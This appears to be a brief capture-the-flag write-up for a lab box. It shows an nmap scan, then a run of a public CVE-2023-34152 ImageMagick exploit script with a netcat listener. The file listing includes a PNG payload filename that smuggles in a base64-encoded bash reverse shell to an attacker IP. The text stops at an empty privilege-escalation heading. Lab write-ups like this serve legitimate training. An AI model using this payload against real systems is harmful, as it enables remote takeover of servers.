Image
Information Gathering
Port and Scanning
Nmap scan report for 192.168.224.178
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: ImageMagick Identifier
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel┌──(kali㉿kali)-[~/ctf/pg/image/CVE-2023-34152]
└─$ python3 CVE-2023-34152.py 192.168.45.244 80
Created by SudoIndividual (https://github.com/SudoIndividual)
PNG file (payload) have been created in current directory. Upload the payload to the server
Do you want to run netcat shell? [y/N]y
listening on [any] 80 ...
^C
┌──(kali㉿kali)-[~/ctf/pg/image/CVE-2023-34152]
└─$ ls
CVE-2023-34152.py README.md '|smile"`echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yNDQvODAgMD4mMSI=|base64 -d|bash`".png'Priv Esc
Last updated